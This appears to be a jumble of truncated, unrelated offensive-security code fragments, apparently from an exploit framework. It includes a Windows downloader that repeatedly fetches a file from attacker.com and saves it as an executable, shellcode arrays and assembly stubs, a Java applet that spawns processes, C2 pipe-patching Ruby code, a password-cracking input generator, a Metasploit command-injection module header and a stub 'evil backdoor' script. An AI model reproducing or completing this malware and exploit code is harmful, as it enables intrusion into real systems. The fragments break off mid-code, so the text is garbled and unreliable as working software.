#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <urlmon.h>
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpszCmdLine, int nCmdShow) {
    const char szFilename[] = "runme.exe";
    const char szDownloadUrl[] = "http://attacker.com/file.jpg";
    while(1) {
        if (URLDownloadToFile(NULL, szDownloadUrl, szFilename, BINDF_GETNEWESTVERSION, NULL) == S_OK) {
#!/usr/bin/env ruby
def b32_to_i(bin_arr)
  val = 0; bin_arr.each_with_index { |b,i| val += b*(2**(31-i)) }; val
end
def i_to_b32(num)
  val = 31.downto(0).each.map { |i| num[i] }
end
#!/usr/bin/ruby
require 'digest/sha1'
if !ARGV[0] || !ARGV[1]
  puts "Usage: accgen.rb <john-style-passfile.txt> <mschapv2acc-bin-output>"
  puts ""
  puts "Takes a John-style passwd file as input, separated as follows:"
  puts "username:::AUTH_HASH:RESPONSE_HASH:PEER_HASH"
  puts "The output file is ready for mschapv2acc cracking."
  puts ""
#define WIN32_LEAN_AND_MEAN
#include "Windows.h"
BYTE shellcode[] =
import java.io.*;
import java.net.*;
import java.applet.*;
public class Plugin extends Applet {
    public void init() {
        Process f;
        try {
            java.io.BufferedInputStream in = new java.io.BufferedInputStream(new
require 'win32/pipe'
require 'timeout'
require 'injector'
def update_https_code(cnc_host, url, params, pipe)
  pipe = "\\\\.\\pipe\\#{pipe}"
  url = "#{url}\x00\x00\x00\x00\x00\x00" if url.length < 6
  params = "\x00" if params.empty?
  pipe_offset = (@https_pipe_code =~ /\\\\\.\\pipe\\fooo/)
  url_offset = (@https_pipe_code =~ /\/12345/)
%define u(x) __utf16__(x)
[BITS 32]
[ORG 0]
  cld
  mov esi, esp ; ESI points to the current position of the stack (for ref local var)
  sub esp, 0x2000 ; Alloc some space on stack
  call start
delta:
%define u(x) __utf16__(x)
[BITS 64]
[ORG 0]
  cld ; Clear the direction flag.
  and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned
  mov rsi, rsp ; RSI points to the current position of the stack (for ref local var)
  sub rsp, 0x2000 ; Allocate some stack space
  call start ; Call start, this pushes the address of 'api_call' onto the stack.
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  def initialize(info={})
    super(update_info(info,
      'Name' => "Belkin Netcam HD UPnP Command Injection",
#!/bin/bash
echo "I am an evil backdoor"